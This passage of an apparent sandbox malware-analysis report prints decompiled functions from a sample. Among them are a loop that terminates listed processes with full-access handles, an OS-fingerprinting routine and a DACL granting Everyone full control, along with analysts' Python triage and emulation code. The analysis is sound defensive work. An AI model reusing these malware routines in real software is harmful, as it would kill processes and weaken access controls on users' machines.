                                                                                    						if(_t67 != 0) {
                                                                                    							 *_t88 = 0;                                 /* release the spinlock while tearing the entry down */
                                                                                    						}
                                                                                    						_t68 = _v16;
                                                                                    						E04ED4FF0(_t68 + 0x8c);                         /* tear down the dequeued entry: two critical sections, then the heap block */
                                                                                    						DeleteCriticalSection(_t68 + 0x6c);
                                                                                    						DeleteCriticalSection(_t68 + 0x54);
                                                                                    						HeapFree( *( *_t68), 0, _t68);
                                                                                    						_t38 = InterlockedCompareExchange(_t88, 1, 0);
                                                                                    						asm("sbb ebx, ebx");
                                                                                    						_t67 =  ~_t38 + 1;
                                                                                    						if(_t67 == 0) {
                                                                                    							goto L24;
                                                                                    						} else {
                                                                                    							_t82 = _v8;
                                                                                    							goto L12;
                                                                                    						}
                                                                                    						L22:
                                                                                    						if(_t67 == 0) {
                                                                                    							goto L24;
                                                                                    						}
                                                                                    						L23:
                                                                                    						 *_t88 = 0;   /* release the spinlock */
                                                                                    						return _t38;
                                                                                    					}
                                                                                    				}
                                                                                    				if(InterlockedCompareExchange(__ecx, 1, 0) == 0) {   /* _a4 != 0: take the lock and drain the whole list regardless of age */
                                                                                    					while(1) {
                                                                                    						L3:
                                                                                    						_t38 = _t88[2];
                                                                                    						_t71 =  *(_t38 + 4);
                                                                                    						if(_t71 == 0) {
                                                                                    							goto L23;
                                                                                    						}
                                                                                    						_t72 =  *_t71;
                                                                                    						_t88[2] =  *(_t88[2] + 4);
                                                                                    						InterlockedDecrement( &(_t88[1]));
                                                                                    						_push(8);
                                                                                    						E04ED5777(_t88[2]);
                                                                                    						_t89 = _t89 + 8;
                                                                                    						E04ED4FF0(_t72 + 0x8c);
                                                                                    						DeleteCriticalSection(_t72 + 0x6c);
                                                                                    						DeleteCriticalSection(_t72 + 0x54);
                                                                                    						HeapFree( *( *_t72), 0, _t72);
                                                                                    					}
                                                                                    					goto L23;
                                                                                    				} else {
                                                                                    					goto L2;
                                                                                    				}
                                                                                    				do {
                                                                                    					L2:
                                                                                    					asm("pause");   /* spin with PAUSE until the compare-exchange wins the lock */
                                                                                    				} while (InterlockedCompareExchange(_t88, 1, 0) != 0);
                                                                                    				goto L3;
                                                                                    			}

                                                                                    Instruction addresses (the address column belonging to the listing above, in order; 0x00000000 marks decompiler-generated lines with no address):
                                                                                    0x04ed549d, 0x04ed54a0, 0x04ed54a2, 0x04ed5522, 0x04ed565b, 0x04ed565b, 0x04ed565b, 0x04ed5531, 0x04ed5539, 0x04ed554a, 0x04ed553b, 0x04ed5541, 0x04ed5543, 0x04ed5543, 0x04ed5541, 0x04ed5564, 0x04ed5569, 0x00000000, 0x04ed556f, 0x04ed556f, 0x04ed5571, 0x04ed557c, 0x04ed557f, 0x04ed5589, 0x04ed558b, 0x04ed558e, 0x00000000, 0x00000000, 0x00000000, 0x04ed5594, 0x04ed5598, 0x04ed559a, 0x04ed55a1, 0x04ed55a7, 0x04ed55a9, 0x04ed55ae, 0x04ed55b0, 0x04ed55b0, 0x04ed55b6, 0x04ed55b6, 0x04ed55b9, 0x04ed55bc, 0x04ed55c1, 0x00000000, 0x00000000, 0x04ed55c7, 0x04ed55cb, 0x04ed55ce, 0x04ed55d4, 0x00000000, 0x00000000, 0x04ed55dc, 0x04ed55e3, 0x04ed55e9, 0x04ed55ec, 0x04ed55f1, 0x04ed55f6, 0x04ed55f8, 0x04ed55f8, 0x04ed55fe, 0x04ed5609, 0x04ed5612, 0x04ed561c, 0x04ed5627, 0x04ed5632, 0x04ed563c, 0x04ed563e, 0x04ed5641, 0x00000000, 0x04ed5643, 0x04ed5643, 0x00000000, 0x04ed5643, 0x04ed564b, 0x04ed564d, 0x00000000, 0x00000000, 0x04ed564f, 0x04ed564f, 0x00000000, 0x04ed564f, 0x04ed5569, 0x04ed54b3, 0x04ed54c2, 0x04ed54c2, 0x04ed54c2, 0x04ed54c5, 0x04ed54ca, 0x00000000, 0x00000000, 0x04ed54d3, 0x04ed54d8, 0x04ed54df, 0x04ed54e5, 0x04ed54e8, 0x04ed54f5, 0x04ed54f8, 0x04ed5501, 0x04ed550b, 0x04ed5516, 0x04ed5516, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x04ed54b5, 0x04ed54b5, 0x04ed54b5
                                                                                    0x04ed54be
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04ED54AF
                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04ED54BC
                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 04ED54DF
                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 04ED5501
                                                                                    • DeleteCriticalSection.KERNEL32(00000000), ref: 04ED550B
                                                                                    • HeapFree.KERNEL32(?,00000000,?), ref: 04ED5516
                                                                                    • timeGetTime.WINMM ref: 04ED5552
                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04ED557F
                                                                                    • timeGetTime.WINMM ref: 04ED55A1
                                                                                    • timeGetTime.WINMM ref: 04ED55B0
                                                                                    • InterlockedDecrement.KERNEL32(00000000), ref: 04ED55E3
                                                                                    • DeleteCriticalSection.KERNEL32(?,?,?), ref: 04ED5612
                                                                                    • DeleteCriticalSection.KERNEL32(00000000), ref: 04ED561C
                                                                                    • HeapFree.KERNEL32(?,00000000,?), ref: 04ED5627
                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04ED5632
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Interlocked$CompareCriticalDeleteExchangeSection$Timetime$DecrementFreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 517897276-0
                                                                                    • Opcode ID: c4927a1f5f2df6e845e22346fd5edbc3c738ec627cd77b88d2420eac0360fff6
                                                                                    • Instruction ID: edd939a58fa5c79cb8f0d871f8c427b3e9feb3aeef498c208bef575eec686972
                                                                                    • Opcode Fuzzy Hash: c4927a1f5f2df6e845e22346fd5edbc3c738ec627cd77b88d2420eac0360fff6
                                                                                    • Instruction Fuzzy Hash: 0B51C272600301BFDB20DFA5C9C8B59BBB9EF84305F144529E9168B294DB78F946CB51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 68%
			// OS fingerprinting routine. __ecx points at a 0x120-byte output object; the
			// layout written below is: +0x00 major, +0x04 minor, +0x08 build, +0x0c
			// platform id, +0x10 64-bit-OS flag, +0x14 result of E04EC5980 on the own
			// process handle, +0x18 SM_SERVERR2 result, +0x1c server-SKU flag, +0x20 a
			// 128-WCHAR copy of szCSDVersion. From the call pattern, E04EDDAD0 behaves
			// as memset and E04ED572E as the stack-cookie check.
			E04EC5A10(intOrPtr* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v18;
				struct _OSVERSIONINFOW _v300;
				signed int _v304;
				char _v308;
				char _v312;
				intOrPtr _v316;
				char _v348;
				signed int _t45;
				_Unknown_base(*)()* _t49;
				intOrPtr _t50;
				intOrPtr _t57;
				_Unknown_base(*)()* _t61;
				intOrPtr _t65;
				signed int _t73;
				intOrPtr _t76;
				intOrPtr _t86;
				intOrPtr _t89;
				signed short* _t90;
				intOrPtr _t93;
				void* _t95;
				void* _t97;
				signed int _t98;
				intOrPtr* _t100;
				signed int _t101;
				void* _t118;

				_t45 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t45 ^ _t101; // stack cookie XOR ebp, verified at every return
				_t100 = __ecx;
				E04EDDAD0(__edi, __ecx, 0, 0x120); // zero the 0x120-byte output object
				_t97 = LoadLibraryA;
				// GetNativeSystemInfo is resolved at run time rather than imported, so the
				// import table never shows it.
				_t49 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetNativeSystemInfo");
				if(_t49 == 0) {
					L4:
					_t50 = 0;
				} else {
					asm("xorps xmm0, xmm0");
					_v316 = 0;
					asm("movups [ebp-0x158], xmm0");
					asm("movups [ebp-0x148], xmm0");
					 *_t49( &_v348); // GetNativeSystemInfo(&SYSTEM_INFO)
					_t76 = _v348; // wProcessorArchitecture
					// 6 = PROCESSOR_ARCHITECTURE_IA64, 9 = PROCESSOR_ARCHITECTURE_AMD64:
					// the native architecture is reported even to a WOW64 (32-bit) process.
					if(_t76 == 6 || _t76 == 9) {
						_t50 = 1;
					} else {
						goto L4;
					}
				}
				 *((intOrPtr*)(_t100 + 0x10)) = _t50; // 64-bit OS flag
				 *((intOrPtr*)(_t100 + 0x14)) = E04EC5980(GetCurrentProcess()); // helper on the own process handle; not shown here
				E04EDDAD0(_t97,  &_v300, 0, 0x11c);
				_v300.dwOSVersionInfoSize = 0x11c; // sizeof(OSVERSIONINFOEXW): the EX form exposes wProductType
				if(GetVersionExW( &_v300) != 0) {
					_t89 = _v300.dwMajorVersion;
					_t93 = _v300.dwMinorVersion;
					 *(_t100 + 8) = _v300.dwBuildNumber;
					 *((intOrPtr*)(_t100 + 0xc)) = _v300.dwPlatformId;
					 *_t100 = _t89;
					 *((intOrPtr*)(_t100 + 4)) = _t93;
					// _v18 lies at struct offset 0x11a, i.e. wProductType; anything other
					// than VER_NT_WORKSTATION (1) is recorded as a server SKU.
					 *(_t100 + 0x1c) = 0 | _v18 != 0x00000001;
					// 5.2 covers Server 2003 and XP x64; GetSystemMetrics(SM_SERVERR2 = 0x59)
					// tells Server 2003 R2 apart.
					if(_t89 == 5 && _t93 == 2) {
						 *((intOrPtr*)(_t100 + 0x18)) = GetSystemMetrics(0x59);
					}
					// copy szCSDVersion, WCHAR by WCHAR including the terminator, to +0x20
					_t90 =  &(_v300.szCSDVersion);
					_t23 = _t100 + 0x20; // 0x20
					_t95 = _t23 - _t90;
					do {
						_t73 =  *_t90 & 0x0000ffff;
						_t90 =  &(_t90[1]);
						 *(_t95 + _t90 - 2) = _t73;
					} while (_t73 != 0);
				}
				_t57 =  *_t100;
				// GetVersionExW answers 6.2 to any process without a compatibility manifest
				// on Windows 8.1 and later, and major stays 0 if the call failed; in both
				// cases the sample falls back to the undocumented ntdll export.
				if(_t57 != 6 ||  *((intOrPtr*)(_t100 + 4)) != 2) {
					if(_t57 != 0) {
						goto L21;
					} else {
						goto L14;
					}
				} else {
					L14:
					_t61 = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlGetNtVersionNumbers");
					if(_t61 == 0) {
						return E04ED572E(_v8 ^ _t101); // stack-cookie check
					} else {
						 *_t61( &_v308,  &_v312,  &_v304); // RtlGetNtVersionNumbers(&major, &minor, &build)
						_t98 = _v304 & 0x0000ffff; // the build value carries flag bits in its high word; keep the real build number
						_t92 =  *_t100;
						_t65 = _v308;
						_t86 = _v312;
						_v304 = _t98;
						_t118 = _t65 -  *_t100;
						// overwrite only when ntdll reports a newer (major, minor) pair
						if(_t118 > 0 || _t118 == 0 && _t86 >  *((intOrPtr*)(_t100 + 4))) {
							 *_t100 = _t65;
							 *((intOrPtr*)(_t100 + 4)) = _t86;
							 *(_t100 + 8) = _t98;
							 *(_t100 + 0x1c) = 0 | E04EC5870(_t92, _t98) != 0x00000000; // server flag recomputed from (major, build) by a helper not shown here
							if( *_t100 == 5 &&  *((intOrPtr*)(_t100 + 4)) == 2) {
								 *((intOrPtr*)(_t100 + 0x18)) = GetSystemMetrics(0x59);
							}
						}
						L21:
						return E04ED572E(_v8 ^ _t101); // stack-cookie check
					}
				}
			}

(per-line address column of E04EC5A10, 0x04ec5a19 - 0x04ec5bfc; the extraction separated it from the code lines it annotated, so it is not recoverable line by line)

                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,00000000), ref: 04EC5A47
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC5A4A
                                                                                    • GetCurrentProcess.KERNEL32(?,?,00000000), ref: 04EC5A96
                                                                                    • GetVersionExW.KERNEL32(0000011C,?,?,?,?,?,00000000), ref: 04EC5ACD
                                                                                    • GetSystemMetrics.USER32 ref: 04EC5B12
                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll,RtlGetNtVersionNumbers,?,?,?,?,?,00000000), ref: 04EC5B5F
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC5B62
                                                                                    • GetSystemMetrics.USER32 ref: 04EC5BCD
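The "APIs" listings in this report are terse but regular, and they are often all an analyst gets before deciding whether a function deserves a closer look. The following Python is an added example, not code from the report or from the sample: it parses lines in that format and flags two behaviours seen in this sample, the run-time resolution of RtlGetNtVersionNumbers and GetNativeSystemInfo in E04EC5A10, and the OpenProcess(PROCESS_ALL_ACCESS)/TerminateProcess loop in E04EBDD10 further down. The first input block is copied from the eight lines above; the second is constructed to mirror what the decompiled loop does, and its ref addresses are placeholders rather than values from the report.

```python
import re

# Copied from the "APIs" list for E04EC5A10 in this report.
REPORT_LINES = """
• LoadLibraryA.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,00000000), ref: 04EC5A47
• GetProcAddress.KERNEL32(00000000), ref: 04EC5A4A
• GetCurrentProcess.KERNEL32(?,?,00000000), ref: 04EC5A96
• GetVersionExW.KERNEL32(0000011C,?,?,?,?,?,00000000), ref: 04EC5ACD
• GetSystemMetrics.USER32 ref: 04EC5B12
• LoadLibraryA.KERNEL32(ntdll.dll,RtlGetNtVersionNumbers,?,?,?,?,?,00000000), ref: 04EC5B5F
• GetProcAddress.KERNEL32(00000000), ref: 04EC5B62
• GetSystemMetrics.USER32 ref: 04EC5BCD
"""

# Constructed input in the same format, mirroring the per-PID loop in E04EBDD10
# (OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid), TerminateProcess, CloseHandle).
# The ref values are placeholders, not addresses taken from the report.
CONSTRUCTED_KILL_LINES = """
• OpenProcess.KERNEL32(001FFFFF,00000000,00000A1C), ref: 00000001
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00000002
• CloseHandle.KERNEL32(00000000), ref: 00000003
• OpenProcess.KERNEL32(001FFFFF,00000000,00000B40), ref: 00000004
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00000005
• CloseHandle.KERNEL32(00000000), ref: 00000006
• Sleep.KERNEL32(00000064), ref: 00000007
"""

PROCESS_ALL_ACCESS = 0x1FFFFF

# "<api>.<module>(<args>), ref: <hex>"; the argument list is optional
# (compare the GetSystemMetrics lines, which carry none).
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


def parse_api_lines(text):
    """Turn a report 'APIs' listing into a list of call records, in order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a for a in (m.group("args") or "").split(",") if a]
        calls.append({"api": m.group("api"), "mod": m.group("mod"),
                      "args": args, "ref": int(m.group("ref"), 16)})
    return calls


def _as_hex(s):
    """Joe Sandbox prints unknown arguments as '?' and strings verbatim."""
    try:
        return int(s, 16)
    except ValueError:
        return None


def triage(calls):
    """Return human-readable findings for the two behaviours this sample shows."""
    findings = []
    # Strings pushed for GetProcAddress appear as arguments of the preceding call.
    args_seen = {a for c in calls for a in c["args"]}
    if "RtlGetNtVersionNumbers" in args_seen:
        findings.append("resolves RtlGetNtVersionNumbers from ntdll: reads the real OS "
                        "version instead of the compatibility-shimmed GetVersionEx value")
    if "GetNativeSystemInfo" in args_seen:
        findings.append("resolves GetNativeSystemInfo: native CPU architecture check, "
                        "sees through WOW64")
    # A kill loop: OpenProcess with all rights, then TerminateProcess within the
    # next three calls, repeated per PID.
    kills = 0
    for i, c in enumerate(calls):
        if c["api"] == "OpenProcess" and c["args"] \
                and _as_hex(c["args"][0]) == PROCESS_ALL_ACCESS:
            window = [x["api"] for x in calls[i + 1:i + 4]]
            if "TerminateProcess" in window:
                kills += 1
    if kills:
        findings.append("OpenProcess(PROCESS_ALL_ACCESS) followed by TerminateProcess: "
                        "process-kill loop (%d iterations seen)" % kills)
    return findings


if __name__ == "__main__":
    for block in (REPORT_LINES, CONSTRUCTED_KILL_LINES):
        for finding in triage(parse_api_lines(block)):
            print("-", finding)
```

The argument strings that name the next GetProcAddress target (kernel32.dll, GetNativeSystemInfo, ntdll.dll, RtlGetNtVersionNumbers) are what the report's own "API String ID" is computed from; keying a rule on them is cheaper than matching the fuzzy hash and survives recompilation.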
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadMetricsProcSystem$CurrentProcessVersion
                                                                                    • String ID: GetNativeSystemInfo$RtlGetNtVersionNumbers$kernel32.dll$ntdll.dll
                                                                                    • API String ID: 3805471242-3094728150
                                                                                    • Opcode ID: 190265bd55cd54b491687b332184a23f27740a1178214b41ea9faf0cea11e0e6
                                                                                    • Instruction ID: bab2051c2a2dbec26fcc36bad559b31c46c820d501992087866889b61b2319c2
                                                                                    • Opcode Fuzzy Hash: 190265bd55cd54b491687b332184a23f27740a1178214b41ea9faf0cea11e0e6
                                                                                    • Instruction Fuzzy Hash: 19517030A00229DBDB34DF65CE45BEABBF4EF48305F14559ED88A97640EA74BA85CF40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
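To make the field semantics of E04EC5A10 concrete, here is an added Python emulation of the routine (not code from the sample or from the report). The two version sources it consults, GetVersionExW and RtlGetNtVersionNumbers, are modelled as plain inputs so the logic runs without Windows, and a pack/parse pair is included for the 0x120-byte object the routine fills, which is what you would use to read that object back out of the 0x04EB0000 dump. Offsets and constants follow the decompilation above; the helper stored at +0x14 and the server-flag helper E04EC5870 are not shown on this page, so the emulation takes the first as a caller-supplied value and keeps the earlier server flag for the second, both labelled as assumptions. The version tuples used in the tests are constructed sample values.

```python
import struct

# Windows SDK constants (not from the report).
VER_NT_WORKSTATION = 1
PROCESSOR_ARCHITECTURE_IA64 = 6
PROCESSOR_ARCHITECTURE_AMD64 = 9
OBJ_SIZE = 0x120   # memset(this, 0, 0x120) at the top of E04EC5A10
CSD_OFF = 0x20     # szCSDVersion copy starts here; 128 WCHARs fill the remainder
FIELD_KEYS = ("major", "minor", "build", "platform", "is_64bit_os",
              "field_14", "server_r2", "is_server")


def fingerprint(gve, rtl, native_arch, product_type, field_14=0, is_r2=False):
    """Reproduce what E04EC5A10 writes into its output object.

    gve: (major, minor, build, platform_id, csd) as GetVersionExW reports them,
         or None when that call fails (major then stays 0, as in the sample).
    rtl: (major, minor, raw_build) as RtlGetNtVersionNumbers returns them; the
         raw build carries flag bits in its high word, masked off by the sample.
    native_arch: SYSTEM_INFO.wProcessorArchitecture from GetNativeSystemInfo.
    product_type: OSVERSIONINFOEXW.wProductType.
    field_14: stands in for E04EC5980(GetCurrentProcess()), not shown here (assumption).
    is_r2: the answer GetSystemMetrics(SM_SERVERR2) would give.
    """
    info = {
        "major": 0, "minor": 0, "build": 0, "platform": 0,
        "is_64bit_os": int(native_arch in (PROCESSOR_ARCHITECTURE_IA64,
                                           PROCESSOR_ARCHITECTURE_AMD64)),
        "field_14": field_14, "server_r2": 0, "is_server": 0, "csd": "",
    }
    if gve is not None:
        major, minor, build, platform, csd = gve
        info.update(major=major, minor=minor, build=build, platform=platform, csd=csd)
        info["is_server"] = int(product_type != VER_NT_WORKSTATION)
        if (major, minor) == (5, 2):            # Server 2003 / XP x64
            info["server_r2"] = int(is_r2)
    # Fallback taken when GetVersionExW failed or reported 6.2, the value every
    # un-manifested process gets on Windows 8.1 and later.
    if info["major"] == 0 or (info["major"], info["minor"]) == (6, 2):
        r_major, r_minor, raw_build = rtl
        if (r_major, r_minor) > (info["major"], info["minor"]):
            info.update(major=r_major, minor=r_minor, build=raw_build & 0xFFFF)
            # The sample recomputes is_server via E04EC5870(old_major, build), a
            # helper not shown on the page; the earlier flag is kept (assumption).
            if (r_major, r_minor) == (5, 2):
                info["server_r2"] = int(is_r2)
    return info


def pack_osinfo(info):
    """Lay the object out as the sample does: eight DWORDs, then UTF-16LE CSD string."""
    head = struct.pack("<8I", *(info[k] for k in FIELD_KEYS))
    room = OBJ_SIZE - CSD_OFF - 2               # leave space for the NUL terminator
    csd = info["csd"].encode("utf-16-le")[:room] + b"\x00\x00"
    return (head + csd).ljust(OBJ_SIZE, b"\x00")


def parse_osinfo(blob):
    """Decode a 0x120-byte object read from the dump back into a dict."""
    if len(blob) < OBJ_SIZE:
        raise ValueError("need %#x bytes, got %#x" % (OBJ_SIZE, len(blob)))
    info = dict(zip(FIELD_KEYS, struct.unpack_from("<8I", blob, 0)))
    wide = blob[CSD_OFF:OBJ_SIZE].decode("utf-16-le", errors="replace")
    info["csd"] = wide.split("\x00", 1)[0]
    return info


if __name__ == "__main__":
    # Constructed: Windows 10 20H2 host, no manifest, 64-bit, workstation SKU.
    win10 = fingerprint((6, 2, 9200, 2, ""), (10, 0, 0xF0004A61), 9, 1)
    print(win10)
    print(parse_osinfo(pack_osinfo(win10)) == win10)
```

The Windows 10 case is the interesting one: GetVersionExW hands back 6.2.9200, the comparison against the ntdll numbers succeeds, and the object ends up holding 10.0.19041 with the 0xF000 flag bits stripped from the build. Searching the dump for the DWORD sequence 0A 00 00 00 00 00 00 00 61 4A 00 00 is therefore a quick way to locate the live object on such a host.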

                                                                                    C-Code - Quality: 56%
                                                                                    			E04EBDD10(intOrPtr __ecx, intOrPtr _a4, void* _a8) {
                                                                                    				intOrPtr _v8;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				intOrPtr _t19;
                                                                                    				void* _t20;
                                                                                    				int _t25;
                                                                                    				int _t32;
                                                                                    				void* _t40;
                                                                                    				void* _t42;
                                                                                    				void* _t44;
                                                                                    				void* _t49;
                                                                                    				void* _t53;
                                                                                    				void* _t57;
                                                                                    				intOrPtr _t64;
                                                                                    				void* _t67;
                                                                                    				void* _t71;
                                                                                    				void* _t74;
                                                                                    
                                                                                    				_push(__ecx);
                                                                                    				_t40 = _a8;
                                                                                    				_t64 = __ecx;
                                                                                    				_t57 = 0;
                                                                                    				_v8 = __ecx;
                                                                                    				if(_t40 != 0) { // _a4: array of DWORD PIDs, _a8: its length in bytes
                                                                                    					do {
                                                                                    						// open each listed PID with PROCESS_ALL_ACCESS (0x1fffff) and terminate it
                                                                                    						_t74 = OpenProcess(0x1fffff, 0,  *(_t57 + _a4));
                                                                                    						TerminateProcess(_t74, 0);
                                                                                    						CloseHandle(_t74);
                                                                                    						_t57 = _t57 + 4;
                                                                                    					} while (_t57 < _t40);
                                                                                    					_t64 = _v8;
                                                                                    				}
                                                                                    				Sleep(0x64); // 100 ms
                                                                                    				// dispatch on the object's mode field at offset 0xc (2, 3, or anything else)
                                                                                    				_t19 =  *((intOrPtr*)(_t64 + 0xc));
                                                                                    				if(_t19 != 2) {
                                                                                    					__eflags = _t19 - 3;
                                                                                    					if(__eflags != 0) {
                                                                                    						_t20 = E04EBDB70(_t64, __eflags);
                                                                                    						goto L10;
                                                                                    					} else {
                                                                                    						_t20 = E04EBD960(_t57, _t64);
                                                                                    						_a8 = _t20;
                                                                                    						__eflags = _t20;
                                                                                    						if(_t20 == 0) {
                                                                                    							goto L10;
                                                                                    						} else {
                                                                                    							// reply buffer: a 1-byte tag 0x8e followed by a copy of the result,
                                                                                    							// then handed to E04EB1C60 with message id 0x3f
                                                                                    							_t14 = LocalSize(_t20) + 1; // 0x1
                                                                                    							_t42 = LocalAlloc(0x40, _t14);
                                                                                    							_t67 = _a8;
                                                                                    							_t16 = _t42 + 1; // 0x1
                                                                                    							_t49 = _t16;
                                                                                    							 *_t42 = 0x8e;
                                                                                    							E04EDDC90(_t49, _t67, _t21);
                                                                                    							LocalFree(_t67);
                                                                                    							_t25 = LocalSize(_t42);
                                                                                    							_push(_t49);
                                                                                    							_push(0x3f);
                                                                                    							_push(_t25);
                                                                                    							_push(_t42);
                                                                                    							E04EB1C60( *((intOrPtr*)(_v8 + 4)));
                                                                                    							return LocalFree(_t42);
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t20 = E04EBD550(_t57, _t64);
                                                                                    					_a8 = _t20;
                                                                                    					if(_t20 == 0) {
                                                                                    						L10:
                                                                                    						return _t20;
                                                                                    					} else {
                                                                                    						_t8 = LocalSize(_t20) + 1; // 0x1
                                                                                    						_t44 = LocalAlloc(0x40, _t8);
                                                                                    						_t71 = _a8;
                                                                                    						_t10 = _t44 + 1; // 0x1
                                                                                    						_t53 = _t10;
                                                                                    						 *_t44 = 0x8e;
                                                                                    						E04EDDC90(_t53, _t71, _t28);
                                                                                    						LocalFree(_t71);
                                                                                    						_t32 = LocalSize(_t44);
                                                                                    						_push(_t53);
                                                                                    						_push(0x3f);
                                                                                    						_push(_t32);
                                                                                    						_push(_t44);
                                                                                    						E04EB1C60( *((intOrPtr*)(_v8 + 4)));
                                                                                    						return LocalFree(_t44);
                                                                                    					}
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,?,?,?,?,04EBD45D,?,?), ref: 04EBDD32
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,?,?,04EBD45D,?,?), ref: 04EBDD3D
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,04EBD45D,?,?), ref: 04EBDD44
                                                                                    • Sleep.KERNEL32(00000064,?,?,?,?,?,04EBD45D,?,?), ref: 04EBDD56
                                                                                    • LocalSize.KERNEL32 ref: 04EBDD7B
                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,04EBD45D,?,?), ref: 04EBDD85
                                                                                    • LocalFree.KERNEL32(?), ref: 04EBDDA8
                                                                                    • LocalSize.KERNEL32 ref: 04EBDDAB
                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 04EBDDBE
                                                                                    • LocalSize.KERNEL32 ref: 04EBDDE1
                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,04EBD45D,?,?), ref: 04EBDDEB
                                                                                    • LocalFree.KERNEL32(?), ref: 04EBDE0E
                                                                                    • LocalSize.KERNEL32 ref: 04EBDE11
                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 04EBDE24
                                                                                      • Part of subcall function 04EBDB70: LocalAlloc.KERNEL32(00000040,74E45A91,00000000,?,?), ref: 04EBDBBE
                                                                                      • Part of subcall function 04EBDB70: LocalFree.KERNEL32(?,?,?,?), ref: 04EBDBE0
                                                                                      • Part of subcall function 04EBDB70: LocalFree.KERNEL32(?,?,?,?), ref: 04EBDBFE
                                                                                      • Part of subcall function 04EBDB70: LocalSize.KERNEL32 ref: 04EBDC05
                                                                                      • Part of subcall function 04EBDB70: LocalFree.KERNEL32(00000000,00000000,00000000,0000003F,?,?,?), ref: 04EBDC1C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$Free$Size$Alloc$Process$CloseHandleOpenSleepTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 363554170-0
                                                                                    • Opcode ID: 4e955817db98afe358ed406a22ea1e7196b91463e3e1ff62148e69461611c89d
                                                                                    • Instruction ID: e40eea0479ad94770b888cc90c3d0c4c15040733af3fcbed8a61a6a00fd75a5c
                                                                                    • Opcode Fuzzy Hash: 4e955817db98afe358ed406a22ea1e7196b91463e3e1ff62148e69461611c89d
                                                                                    • Instruction Fuzzy Hash: 44310B76A01214ABD710EBA5DC40DABB7ADEF89321B044255FE59D7140DE75BD00CBE0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 93%
                                                                                    			E04EBAE50(void* __ebx, void* __edi, void* __esi, struct _SECURITY_DESCRIPTOR* _a4) {
                                                                                    				signed int _v8;
                                                                                    				short _v12;
                                                                                    				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                    				void* _v20;
                                                                                    				struct _SECURITY_DESCRIPTOR* _v24;
                                                                                    				signed int _t16;
                                                                                    				struct _SECURITY_DESCRIPTOR* _t18;
                                                                                    				void* _t20;
                                                                                    				long _t38;
                                                                                    				long _t46;
                                                                                    				void* _t48;
                                                                                    				signed int _t49;
                                                                                    
                                                                                    				_t16 =  *0x4f03008; // 0x3d21fb31, stack security cookie
                                                                                    				_v8 = _t16 ^ _t49;
                                                                                    				_t18 = _a4;
                                                                                    				_t48 = 0;
                                                                                    				_v24 = _t18;
                                                                                    				_v20 = 0;
                                                                                    				_t46 = 0;
                                                                                    				// identifier authority bytes {0,0,0,0,0,1} = SECURITY_WORLD_SID_AUTHORITY;
                                                                                    				// with one subauthority of 0 the SID built below is S-1-1-0 (Everyone)
                                                                                    				_v16.Value = 0;
                                                                                    				_v12 = 0x100;
                                                                                    				if(InitializeSecurityDescriptor(_t18, 1) != 0 && AllocateAndInitializeSid( &_v16, 1, 0, 0, 0, 0, 0, 0, 0, 0,  &_v20) != 0) {
                                                                                    					_t10 = GetLengthSid(_v20) + 0x10; // 0x10
                                                                                    					_t38 = _t10;
                                                                                    					_t48 = HeapAlloc(GetProcessHeap(), 8, _t38);
                                                                                    					// DACL with a single ACE granting GENERIC_ALL (0x10000000) to Everyone
                                                                                    					if(_t48 != 0 && InitializeAcl(_t48, _t38, 2) != 0 && AddAccessAllowedAce(_t48, 2, 0x10000000, _v20) != 0) {
